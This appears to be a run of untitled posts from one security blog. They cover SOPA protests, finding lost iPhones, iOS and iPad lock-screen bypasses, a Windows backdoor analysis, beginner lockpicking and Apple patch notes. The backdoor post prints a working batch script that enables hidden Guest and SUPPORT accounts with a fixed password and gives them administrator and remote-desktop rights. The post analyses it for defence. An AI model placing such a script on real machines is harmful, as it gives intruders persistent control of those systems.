Due to the threat that these acts would pose to the open internet, many large internet companies have stated their opposition including Google, Yahoo!, Twitter, eBay, and Wikimedia, as well as civil liberties groups such as the ACLU and the EFF. On January 18, these and countless other blogs and sites, including Security Generation, will be protesting this legislation by blacking out (read: censor) parts of their sites and educating users about the danger of american censorship.

If you have a blog or website, you’re encouraged to add your voice to the cause. CloudFlare users will be able to easily participate just by enabling the new Stop Censorship app, which will black out large chunks of text on your site, and inform your users about the dangers presented by this type of legislation. WordPress users without CloudFlare can also join in by installing one of the many Stop SOPA/PIPA plugins.

This is my favorite anti-SOPA song so far:

http://www.youtube.com/watch?v=hi4kfTah7yI

This one is also good.

Related posts:

1. Egyptian Government Fighting Protesters, Shuts Down Internet

1. Can I put some contact details on my iPhone’s screen in case it’s found by someone?: I’ve put together the free iPhone Lockscreen Generator to make this task easy! Find My iPhone also allows you to remotely display a custom message on your phone’s screen.
2. Can I locate my iPhone/iPad if I didn’t have Find My iPhone configured on it?: Unfortunately not. Find My iPhone (or another tracking program) is the only way for you to locate your device.
3. Can I locate my iPhone/iPad if I had Location Services turned off, or Airplane Mode turned on?: No, both of these settings prevent your device from reporting its location to the Apple servers (this includes 3rd party tracking services too).
4. Can I find my iPhone/iPad when it is turned off (or battery is dead)?: Simply put, you can’t. The device needs to be on (and have a network connection) in order for it to appear in Find My iPhone for you to track it.
5. Can I find my iPhone/iPad if the SIM card is removed?: Yes, this is possible, but only if the device is turned on and connected to a Wifi network. This would allow the device to return its GPS location to Find My iPhone.
6. Can I track my iPhone/iPad if it’s been erased or restored?: If your device has been restored (or erased using the ‘wipe’ functionality), you will no longer be able to track it.
7. Can I track my iPhone/iPad using its IMEI or Serial Number?: No, it’s not possible for consumers to track a device using its IMEI or Serial Number. In some cases the police/telco may be able to track a phone using its IMEI.
8. What should i do if I lost my iPad and cannot locate it?: Ummm… Step 1: panic, Step 2: if you had Find My iPhone set up on it, you can request it to send you an email if/when the device is located. Otherwise report it lost/stolen to the police (give them its Serial Number), and if it’s found they may return it to you.
9. Is there a reason to not wipe a lost iPhone?: This is a particularly good question. One reason to not wipe it would be so that you can continue tracking it and hopefully recover it. The other side of the coin is the security and privacy side. If the data on the device is extremely private or sensitive, then you may sleep better knowing it’s been wiped.
10. Can I start using iCloud after my iPhone is stolen to wipe the phone?: No, if you didn’t already have iCloud set up on your device with Find My iPhone enabled, you can’t do so after the device is stolen.
11. My iPhone/iPad was only protected with the PIN, will the thief be able to crack it?: It’s highly unlikely. If they enter the wrong PIN too many times, they’ll get locked out. Here’s Apple’s statement about this: ”If you repeatedly enter the wrong passcode, your iPhone, iPad, or iPod touch will be disabled for longer intervals before you can try again. After too many unsuccessful attempts, you won’t be able to try again until you connect it to the computer with which you last synced it.”
12. I had Find My iPhone disabled, but can I track my iPad through iCloud’s Photo Stream if the thief starts taking pictures?: If they take pictures with Geotagging, then you would be able to find out where those pictures were taken (the GPS info is stored in the picture’s metadata). So, if they take a picture whilst at home for example, you could find out (approximately) where that is.

Related posts:

1. Find My iPhone Brings Improved Offline Device Support
2. Protecting and Recovering Your iPhone and iPad from Loss and Theft
3. Locate Lost or Stolen Macs with ‘Find My Mac’ in Lion and iCloud

A tip is all good and well, but creating such a customised image may be beyond the technical abilities of your average iPhone user, so I hacked together the brand new iPhone Lockscreen Generator!

http://lockscreengenerator.com

This free online tool allows anyone to create a customised lockscreen (currently with one of four background images), in less than a minute. Just enter your contact details (first name, alternate contact number), and maybe a short note for whomever finds your iPhone (reward maybe?), click generate, then tap/click on the image to download it. You can do this on your computer, and email yourself the image, or do it directly on your iPhone.

Once downloaded to your iPhone, you can set the image as your lockscreen wallpaper by going into the Photos app, tapping your image, then tap the ‘send to’ icon in the bottom left-hand corner of the screen, select Use as wallpaper > Set > Set Lock Screen.

Don’t forget to share this with your friends! You can even use one of the share links below ;) If you have any feedback or tips, let me know.

No related posts.

Apple reviews every app submitted to the App Store, which has meant that iOS users have not had to worry about outright malware. Since this vulnerability allows the apps to fetch code remotely, they can perform actions not reviewed by the App Store staff. Charlie had submitted a proof-of-concept app that was approved (see video below), but has since been removed by Apple.

The reason this vulnerability works is based around some changes Apple made in iOS 4.3 last year, which allowed Mobile Safari to run javascript at a more privileged level on the devices. This change required Apple to make an exception for Safari to execute unsigned code in a particular area of memory. Charlie Miller’s bug is allegedly a very unique case that allows any app to take advantage of this, and hence run their own unsigned code.

http://www.youtube.com/watch?v=ynTtuwQYNmk

Charlie will be presenting the vulnerability in detail at the SysCan conference in Taiwan next week. Apple has already released a developer beta of iOS 5.0.1 which patches the recent iPad Smart Cover lock screen bypass, but I would not be at all surprised if they release another beta which includes a fix for this bug. Until then, be careful to only install apps from developers you trust.

[Update] Apple has kicked Charlie out of the Developer program. At first I felt that this was an extremely bad reaction on Apple’s part. That said, Apple is probably most upset that Charlie’s proof-of-concept app could have been installed by legitimate users. Regardless of Charlie’s intentions, this could constitute malware, and he should have removed the app as soon as he saw the flaw existed. The posting of his video above probably didn’t help matters either.

No related posts.

When going to check the Windows hosts file to make sure there weren’t any modifications made to it, the following suspicious files were found in %systemroot%\system32\drivers\etc\

1.exe
2.exe
gm.dls
gmreadme
logoff.exe
netstat.exe
query.exe
t.msc
ts.exe

After some analysis, none of these files were found to be inherently malicious, but are instead used by a malicious batch script to enable the Guest and Support accounts with a specific password, and add them to the Admins and RDP group. The 1.exe file, for example, is just a executable with account-management capabilities.

In C:\WINDOWS\Application Compatibility Scripts\Install\Template there was a batch script called “.bat” with the following contents:

@cd %systemroot%\system32\drivers\etc\
@1 localgroup “Remote Desktop Users” SUPPORT_388945a0 /add
@1 localgroup “Remote Desktop Users” guest /add
@1 user guest QQqqaa123321
@1 user guest QQqqaa123321 /add
@1 localgroup administrators guest /add
@1 user guest /active:yes
@1 user SUPPORT_388945a0 QQqqaa123321
@1 user SUPPORT_388945a0 QQqqaa123321 /add
@1 localgroup administrators SUPPORT_388945a0 /add
@1 user SUPPORT_388945a0 /active:yes

At this point it’s fairly evident what’s going on, this bat script is being run periodically, and runs 1.exe to ensure that both the Guest and Support_338945a0 accounts are present, and in the Administrators and Remote Desktop Users groups. It also sets the password to both of those accounts to ‘QQqqaa123321′. If you find these files on your system, consider that server compromised. Remove the files and disable those accounts in the first instance, but a full rebuild is highly recommended to rule out the possibility of other backdoors or rootkits.

These types of batch scripts are not uncommon for backdoor trojans. However, I couldn’t find any references to this particular backdoor, so thought I would post about this in case anyone else searches for information about it. Note that at the time of writing, this batch script is not picked up by any anti-virus software.

Related posts:

1. New Mac OS X Backdoor Trojan (BlackHole RAT) in Development [Updated]
2. Gawker Media Hacked and Accounts Compromised
3. Inform your Friends about their Hacked Accounts

By holding the power button to bring up the ‘Power Off’ screen, closing the smart cover, re-opening it (or just sliding a fridge magnet along the right-hand side of the device), and clicking cancel, the attacker will be dropped into the screen that was open before the iPad was locked. If the attacker gets dropped into the home screen, then they’ll be able to see the installed apps, but won’t be able to open anything. If Safari or Mail (or any other app) was the open when the device was locked, then the attacker would have access to that app.

Unlike Siri being available from the lock screen, which is not a security flaw (an unintended behaviour), this one actually is; and although an attacker does not get full control of the iPad, the severity depends on whether a sensitive app was being used before the device was locked.

Luckily it is possible to protect yourself against this bug in the interim by disabling Smart Covers in Settings > General > iPad Cover Lock/Unlock > Off. Expect Apple to patch this in iOS 5.0.1. Check out 9to5′s video below for a demonstration:

http://www.youtube.com/watch?v=NLgQ22naQhE

[Update] Apple did indeed patch this bug in iOS 5.0.1. Those of you who disabled your Smart Covers for security purposes can now re-enable them!

No related posts.

I had the pleasure of taking part in the Defcon 19 Gringo Warrior contest where participants must bypass a series of locks to ‘escape’. It’s scored based on time and difficult of locks picked. I scored about above average. In this post I’m going to give my own shotgun intro to lockpicking, and provide some videos and links to other useful references where you can go find more detail.

 The Basics

There aren’t too many things you need to understand in order to get into basic lockpicking, but the first thing is to understand the internal components of a basic pin tumbler lock, and how a key activates them in order to open it. In short: every lock has a keyway, and one or more stacks of pins consisting of (from the bottom) a bottom pin, a top pin (aka. driver pin), and a spring.

When the correct key is inserted into the keyway, the pins are raised in such a way that the top pins and bottom pins are positioned on either side of the ‘shear line’. That’s the line within the lock where the plug rotates. Once all pins are aligned correctly, the plug can turn and the lock opens. The video below depicts this concept a bit more clearly.

http://www.youtube.com/watch?v=QiYIYXEX9Ko

Picking and Raking

The aim of lockpicking is to achieve the same outcome, by sequentially pushing pins in the correct order. In order to do so it’s necessary to apply torque to the lock, essentially the same a turning the key in the lock. To do so we use a torque wrench (or tensioner) – essentially a bent piece of metal – to apply a very light amount of torque. One tip here is to apply a very light touch on the torque wrench. Most beginners tend to apply force, essentially squeezing the pins and not allowing them to move. The pressure you apply should be no more than needed to start the plug turning, and it takes lots of practice to get used to. Lockpicking itself actually exploits slight manufacturing flaws in the drilling of the stack holes. By applying torque the plug will bind (get stuck) on the first pin that’s currently ‘in the way’. By gradually pushing up the correct pins using a pick, the pin will ‘set’ into its ‘open’ position, the plug will turn ever so slightly, each time binding on the next pin that’s in the way, until eventually all top pins are out of the way, and the lock can open.

Single-pin picking is the process of pushing individual pins as described above. Another method of achieving the same result faster, and easier for beginners, is called raking. Raking is usually done using a rake pick, and involves sliding the pick across the top of the pins whilst applying torque. The idea behind raking is to get multiple pins to ‘set’ at once, thus expediting the process. Note that for higher quality locks, the effectiveness of raking diminishes. An example of raking is shown in the video below.

http://www.youtube.com/watch?v=wemp-8WD9dY

With raking, my recommendation is usually to sort of ‘caress’ the top of the pins in a cyclical motion. With lockpicking in general, you should always try to have a fairly light touch. The picks should move in and out of the keyway horizontally; there shouldn’t be any twisting, turning or bending of the picks themselves (or any other motion that would cause them to come out mangled). When starting out, just practice pushing down each pin one by one, getting a feel for the feedback through the pick. Learn when a pin is binding, and the slight movement when the plug turns ever so slightly; these are the basics that experienced lockpickers do as second nature.

Learning

I saw Schuyler Towne’s presentation at DC19, and he just recently released a 24-video series on introductory lockpicking, which includes a segment on how to make your own. If you’re just starting out I highly recommend watching these. Just click play below and the entire series will play through.

http://www.youtube.com/watch?v=VVSL0liiWoc

There are countless other lockpicking videos on YouTube, so it’s worth having a look on there. I also recommend checking out the MIT Guide to Lockpicking which has a bunch of useful info on the topic. If you want a good book to learn lockpicking, then you probably can’t do much better than Deviant Ollam’s Practical Lock Picking (it’s also worth checking out his site).

 Getting Equipped

In order to start lockpicking, you’re going to need some picks. A basic 8-pick set is more than enough for the majority of situations. You can even start out by just getting one diamond pick, one snake pick/rake, and one tensioner. Southord produce some high quality picks, I own their 8-pick set as well as their jacknife set. If you’re interested in learning about the different types of picks, check out this DerbyCon talk by Deviant Ollam. Note that the laws around owning lockpicks differ by state and country. Familiarise yourself with the laws in your area before trying to get any picks!

The following sites are some other decent places to get picks:

• http://www.devonlocks.com/ (UK)
• http://www.lockpickshop.com/ (US)
• http://serepick.com/ (Custom tools)

Although I don’t recommend them for beginners, it is entirely possible to make a usable ‘emergency’ lockpick and tension wrench using nothing but paperclips!

Conclusion

Lockpicking is great fun, but takes a lot of practice to get right. The reason I kept this short is because you can read countless books and articles, and watch endless videos, but you’ll never actually progress unless you get hands-on. So get some picks, grab some padlocks and give it a try! If you ever get to go to a security conference, check out whether it has a lockpicking village, as they’re great places to try your hand at new locks and meet some experienced pickers. Remember to only pick locks you have permission to use, and don’t pick locks you rely on, as it’s possible to damage or destroy a lock if you do it wrong! Enjoy.

P.S. Every so often you’ll go to pick a lock and discover an altogether bigger problem, like I did in my hotel room in Hawaii.

Related posts:

1. Pic of the Week: Total Security Epic Fail Theater

[Update] There have been a whole bunch of people crying about how this is a major security flaw. Just to dispel some of the myth… this is not a security flaw, it’s a design decision that Apple made based on usability. Yes, it’s a default setting that may introduce some vulnerabilities, but then again there are still lots of people who run around without passcodes. To be honest I’m usually the first to secure the hell out of everything, but in this case I feel they made the right decision for two reasons. First, Siri is obviously less useful as a hands-free assistant if you need to unlock your phone every time; and secondly making it easier to use will help drive the adoption of Siri.

Luckily Apple thought of this on at least two levels. First, if you ask Siri to unlock your iPhone she’ll respectfully tell you that she “can’t unlock your phone for you”. Secondly – and this is the important one – it is possible to disable the use of Siri when the iPhone is locked. The option now lives in Settings > General > Passcode Lock, where you can set Siri to Off.

Needless to say (contrary to the screenshot), I recommend setting ‘Require Passcode’ to Immediately, turn Simple Passcode off so you can set a 5-or-more-digit PIN, set ‘Siri’ to off to prevent access when your  iPhone is locked, and turn on Erase Data after 10 failed passcode attempts.

Siri is great, but let’s not make it easy for someone to social-engineer her into betraying you. See my other post for more details on protecting your iPhone from loss and theft.

In other news… you can tell Siri to use a specific nickname when talking to you. It’s important to note, however, that the nickname will be put into your VCard. So be careful if you tell her to call you her pimp, and then send someone your contact details ;)

No related posts.

Hit the jump for a summary of the key vulnerabilities patched in Apple’s security updates.

Mac OS X 10.7.2 (and Security Update 2011-006 for Mac OS X 10.6.8)

• Fixed issue allowing changing of user password without existing password and recovering user password hashes
• Fixed issue allowing login without credentials when using Open Directory
• Fix to FileVault 2 where 250MB of data at start of volume was left unencrypted
• Updates to the certificate trust policy (more changes from last update)
• Fix issue in Kernel allowing attacker with physical access to recover user password through FireWire
• Disk images (.dmg) and installer packages (.pkg) removed from “safe” file types
• Snow Leopard Only: Fix for a screen lock bypass for Cinema Display users
• Various fixes to QuickTime and other ‘malicious file’ handling issues

Safari 5.1.1

iOS ‘Pages‘ and ‘Numbers‘ versions 1.5

• Fixed a memory corruption vulnerability with Microsoft Word and Excel documents that could lead to arbitrary code execution

iTunes 10.5

• iTunes no longer requires the installation of QuickTime on Windows
• Fixes a number of arbitrary code execution vulnerabilities already patched in Mac OS X 10.6.8 or 10.7.2

Apple TV 4.4

No related posts.

Note that although WebKnock uses SSL to protect the HTTP session, you are required to supply your fwknop password. If logged or intercepted, your knock details could be used to open firewall ports or even run commands on your server (depending on how you’ve configured fwknop). While WebKnock may be useful in a bind, from a purely security standpoint I don’t recommend using it regularly due to this risk. If you do use it, you should consider changing your fwknop passphrase.

I hope that WebKnock is eventually open-sourced to allow both for the code to be reviewed, and for people to host their own instance of WebKnock. It would also be nice to see more fwknop features being added, including the ability to define a username, and open multiple ports at once (eg. by entering: tcp/22 udp/53 tcp/80). The ‘Allow IP’ field should also get pre-populated with the visitor’s IP address for convenience.

Source: Cipherdyne

No related posts.